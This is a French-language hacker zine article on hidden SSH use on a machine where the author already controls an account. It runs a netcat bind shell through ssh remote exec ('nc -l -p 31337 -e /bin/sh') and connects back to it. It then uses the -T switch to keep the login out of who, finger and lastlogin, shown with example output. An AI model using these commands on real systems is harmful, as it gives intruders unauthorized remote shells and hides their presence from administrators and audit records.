.---+-=[ SSh Stealth connection              ]=------+---------------------------=[09]=----.
|  i|                                                 \__________________  ___  __   _     |
|  I|                                                                    \                 |
|  I|                                                                     '-=[Phawnky   ]=-|
| //                                                                                       |
| L\:-=[Ak : c'est pas l'homme qui fond mais bon...     ]=--------------[~~~~~~~~~~~~]-----|
|                                                                        \          /      | 
'________________________________________________________________________.I[MK-110]I.______'         
 


SSH Stealth Stuff

   Y'a  environ  5-6  mois, un de mes buds de efnet ma montre quelque trucs qui 
peuvent être très utiles quand ça vous tante pas de backdoorer une box  et  que 
vous avez déjà le control sur un  account,  ou  plus  qu'un,  ou  whatever  qui 
ressemble a ça, en-t-k...voici le stock:

   EXEC
      
      Si vous le saviez pas déjà (c'est possible) ssh  permet  de  faire  autre 
      chose que de se logger a distance, et d'avoir un  shell.  En  fait,  vous 
      pouvez spécifiez ce qui est exécuter juste après  que  vous  soyez logger 
      (ou pas, je vais y revenir plus tard). Ca marche comme ca:
      
      <-Funky@-> ssh haxor@fserv 'uname'
      Password:
      FreeBSD

      Ou un truc plus utile du genre:
      
      <-Funky@-> ssh haxor@fserv 'nc -l -p 31337 -e /bin/sh'
      Password: 
      ^Z
      [1]+  Stopped                 ssh haxor@fserv 'nc -l -p 31337 -e /bin/sh'
      <-Funky@-> bg 1
      [1]+ ssh haxor@fserv 'nc -l -p 31337 -e /bin/sh' &
      <-Funky@-> nc fserv 31337
      
      ...etc...
      
      
   STEALTH EXEC
   
      Wo0, remote exec c'est déjà pas mal...mais ça  peut  être  encore  mieux.
      grace a la -T switch de ssh. Vous savez pas c'est quoi? et ça vous  tente
      pas de chercher? no prob:
      
      Extrait de man ssh:
      
      -T      Disable pseudo-tty allocation.
      
      Ok, et ça donne quoi que aucun pseudo-tty nous soit allocater?
      
      2eme extrait de man sshd:

      [ ...snip... ]      
           When a user successfully logs in, sshd does the following:

           1.   If the login is on a tty, and no command has been specified,
                prints last login time and /etc/motd (unless prevented in the
                configuration file or by $HOME/.hushlogin; see the FILES sec-
                tion).

      ***  2.   If the login is on a tty, records login time.
      [ ...snip... ]      
      
      A Vrai dire, c'est pas juste le login time qui record pas.  C'est le user 
      login au complet, le user est pas présent ni  dans finger ni dans who, et 
      ni dans lastlogin.
      
      
      <-Funky@-> who
      root             ttyv0    Nov 11 23:16
      Funky            ttyv1    Nov 11 23:17
      Funky            ttyp0    Dec  5 18:19 (winbox)
   
      <-Funky@-> finger
      Login            Name                 TTY  Idle  Login  Time   Office  Phone
      Funky            Alex Coleman        *v1     6d  Nov 11 23:17
      Funky            Alex Coleman         p0         Sun    18:19
      root             Mo0t Kewt           *v0     8d  Nov 11 23:16

      <-Funky@-> lastlogin haxor
      haxor                                         Never logged in

      Et en plus la seul chose visible dans ps aux c'est ca:
                 
      root  49230  0.0  5.2  2836 1512  ??  I     9:29PM   0:01.39 sshd: haxor@notty
      
      HAH!
      
Pour d'autre truc kewl avec ssh ->  man ssh; man sshd

----------------------------------
Greets: ttl du defunt nixsec@efnet
----------------------------------
  
                                                    phawnky.vous.m'avez.pas.vue